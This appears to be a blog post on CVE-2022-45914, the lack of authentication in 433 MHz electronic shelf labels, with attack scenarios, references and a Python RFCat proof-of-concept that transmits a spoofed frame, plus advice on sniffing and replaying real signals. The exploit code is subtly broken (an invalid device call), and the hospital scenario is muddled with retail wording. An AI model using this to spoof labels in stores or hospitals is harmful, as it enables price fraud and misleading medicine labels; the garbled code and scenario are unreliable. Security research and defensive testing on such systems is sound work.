Imagine walking into a store and using a small device to change the price of anything you want. With CVE-2022-45914, it's not just possible—it's dangerously simple. This vulnerability targets Electronic Shelf Labels (ESL), which are widely used in supermarkets, warehouses, and even hospitals to display and update information like prices or storage codes wirelessly.
In this post, I'll break down how this security hole works, show you example code, share real attack scenarios, and point to original research and references.
What is the Vulnerability? (CVE-2022-45914 Overview)
The bug lies in the ESL protocol implementation of products like the OV80e934802 RF transceiver, commonly found in the ETAG-213-V4.3 20190629 board. The core problem is that these devices do not use any form of authentication for their commands over basic 433 MHz RF (radio frequency).
That means *anyone* with the right hardware (and minimal technical knowledge) can send their own signals to these shelf labels and make them display whatever they want.
- CVE ID: CVE-2022-45914
Attack Vector: 433 MHz wireless RF
- CVE Source: MITRE CVE
How the Attack Works
1. ESL Device Receives Commands via RF: Shelf labels listen for updates sent by a controller device over the air, usually at 433 MHz.
2. No Authentication: The ESLs do not check if the commands are real, signed, or from an authorized source.
3. Spoofing is Easy: A cheap USB or SDR (software-defined radio) stick can record one command and replay it, or be used to craft new commands from scratch.
4. Attack Result: New prices, scrambled messages, dangerous information in a hospital, or major disruption in retail environments.
Hospital Storage Attack
A hospital uses ESL to label medicine storage bins. An attacker in the building uses a small RF transmitter to send fake commands:
Insert offensive or false messages ("Sale on Explosives!").
The store loses money; customers and staff are confused or even injured.
Proof of Concept: Exploit Code
We'll use a YARD Stick One (cheap RF dongle) and the RFCat Python tool. (You can also use SDRs like HackRF or a Flipper Zero.)
WARNING: This is for educational and defensive testing only. Never target real environments without explicit permission.
# Install RFCat: pip install rflib
import rflib
# Replace with your captured valid protocol frame or create one
RF_PAYLOAD = b'\xAA\xBB\xCC\x33\x03\x39\x00\x12\x34\x56' # Example only
def send_esl_packet():
d = rflib.rfcat.devices[]() # Use connected RFCat dongle
d.setFreq(433000000) # Set to 433 MHz
d.setMdmModulation(rflib.MOD_ASK_OOK) # Some ESLs use OOK modulation
d.setMdmDRate(38400) # Set proper data rate (subject to target ESL)
d.RFxmit(RF_PAYLOAD)
d.setModeRX()
if __name__ == '__main__':
send_esl_packet()
print("Signal sent. The shelf label may be updated if in range.")
- To capture valid packets, use SDRSharp, URH (Universal Radio Hacker), or a HackRF to sniff the air for ESL update signals.
Analyze the protocol, construct your payload, then transmit.
Useful guide on replay attacks: Hak5 YARD Stick Replay
References
- CVE-2022-45914 @ NIST
- RF Reverse Engineering & ESL Attacks - DEF CON 28 talk
- RFCat Documentation
- Universal Radio Hacker (URH)
- YARD Stick One Product Page
Conclusion
CVE-2022-45914 is a textbook example of how modern IoT convenience can lead to unforeseen danger. The lack of authentication in widely deployed wireless price tags and medical shelf labels leaves the door wide open for chaos—with little more than a $50 gadget and some open-source software.
If you run or secure ESL systems, take this vulnerability seriously. If you research or hack RF systems, use this as a lesson: always assume that someone might be watching—or transmitting.
---
Timeline
Published on: 11/27/2022 01:15:00 UTC
Last modified on: 02/17/2023 03:31:00 UTC